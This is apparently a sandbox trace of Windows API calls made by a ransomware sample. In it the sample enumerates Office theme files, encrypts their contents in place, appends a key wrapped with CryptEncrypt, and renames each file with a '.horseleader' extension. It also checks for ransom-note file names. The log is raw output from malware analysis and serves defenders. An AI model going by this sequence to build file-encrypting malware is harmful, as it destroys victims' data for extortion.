(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.253] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.253] CloseHandle (hObject=0x158) returned 1 [0247.253] GetProcessHeap () returned 0x780000 [0247.253] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.253] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="JOURNAL", cAlternateFileName="")) returned 1 [0247.253] lstrcmpiW (lpString1="JOURNAL", lpString2="Windows") returned -1 [0247.253] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL") returned 67 [0247.253] lstrcmpW (lpString1="JOURNAL", lpString2=".") returned 1 [0247.254] lstrcmpW (lpString1="JOURNAL", lpString2="..") returned 1 [0247.254] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.254] GetProcessHeap () returned 0x780000 [0247.254] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.254] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*") returned 69 [0247.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.256] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.256] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\.") returned 69 [0247.256] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.256] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.256] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.256] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\..") returned 70 [0247.256] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.256] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.257] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8239a00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x66220ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8239a00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xba32, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="JOURNAL.ELM", cAlternateFileName="")) returned 1 [0247.257] lstrcmpiW (lpString1="JOURNAL.ELM", lpString2="Windows") returned -1 [0247.257] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM") returned 79 [0247.257] StrStrIW (lpFirst="JOURNAL.ELM", lpSrch=".horseleader") returned 0x0 [0247.257] lstrcmpW (lpString1="JOURNAL.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.257] lstrcmpW (lpString1="JOURNAL.ELM", lpString2="_uninstalling_.png") returned 1 [0247.257] lstrlenW (lpString=".testttjffg") returned 11 [0247.257] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM", lpSrch=".testttjffg") returned 0x0 [0247.257] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.257] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.257] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.270] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM") returned 79 [0247.270] StrStrW (lpFirst="JOURNAL.ELM", lpSrch=".txt") returned 0x0 [0247.270] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=47666) returned 1 [0247.270] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.272] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.273] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.273] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.274] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.274] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.274] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1a32, lpOverlapped=0x0) returned 1 [0247.274] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe5ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.274] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1a32, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1a32, lpOverlapped=0x0) returned 1 [0247.275] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.275] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.275] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.275] CloseHandle (hObject=0x1a4) returned 1 [0247.275] GetProcessHeap () returned 0x780000 [0247.275] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.276] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM.horseleader") returned 91 [0247.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.elm.horseleader")) returned 1 [0247.277] GetProcessHeap () returned 0x780000 [0247.277] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.277] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x567e4730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1f3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="JOURNAL.INF", cAlternateFileName="")) returned 1 [0247.277] lstrcmpiW (lpString1="JOURNAL.INF", lpString2="Windows") returned -1 [0247.277] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 79 [0247.277] StrStrIW (lpFirst="JOURNAL.INF", lpSrch=".horseleader") returned 0x0 [0247.277] lstrcmpW (lpString1="JOURNAL.INF", lpString2="#Decrypt#.txt") returned 1 [0247.277] lstrcmpW (lpString1="JOURNAL.INF", lpString2="_uninstalling_.png") returned 1 [0247.278] lstrlenW (lpString=".testttjffg") returned 11 [0247.278] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF", lpSrch=".testttjffg") returned 0x0 [0247.278] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.279] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF") returned 79 [0247.279] StrStrW (lpFirst="JOURNAL.INF", lpSrch=".txt") returned 0x0 [0247.279] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=499) returned 1 [0247.279] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1f3, lpOverlapped=0x0) returned 1 [0247.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.280] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1f3, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1f3, lpOverlapped=0x0) returned 1 [0247.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.281] CloseHandle (hObject=0x1a4) returned 1 [0247.281] GetProcessHeap () returned 0x780000 [0247.281] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.281] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF.horseleader") returned 91 [0247.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\JOURNAL.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\journal.inf.horseleader")) returned 1 [0247.284] GetProcessHeap () returned 0x780000 [0247.285] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.285] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x4d0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.285] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.285] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 79 [0247.285] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.285] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.285] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.285] lstrlenW (lpString=".testttjffg") returned 11 [0247.285] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.285] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.285] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.286] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 79 [0247.286] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.286] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1232) returned 1 [0247.286] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4d0, lpOverlapped=0x0) returned 1 [0247.288] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffb30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.288] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4d0, lpOverlapped=0x0) returned 1 [0247.288] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.288] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.289] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.289] CloseHandle (hObject=0x1a4) returned 1 [0247.289] GetProcessHeap () returned 0x780000 [0247.289] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.289] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.horseleader") returned 91 [0247.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.horseleader")) returned 1 [0247.290] GetProcessHeap () returned 0x780000 [0247.290] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.290] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x47ed, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.290] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.290] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 80 [0247.290] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.290] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.290] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.290] lstrlenW (lpString=".testttjffg") returned 11 [0247.290] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.290] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.291] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.291] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 80 [0247.291] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.291] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=18413) returned 1 [0247.291] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x47ed, lpOverlapped=0x0) returned 1 [0247.293] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb813, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.294] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x47ed, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x47ed, lpOverlapped=0x0) returned 1 [0247.294] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.294] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.294] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.294] CloseHandle (hObject=0x1a4) returned 1 [0247.294] GetProcessHeap () returned 0x780000 [0247.295] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 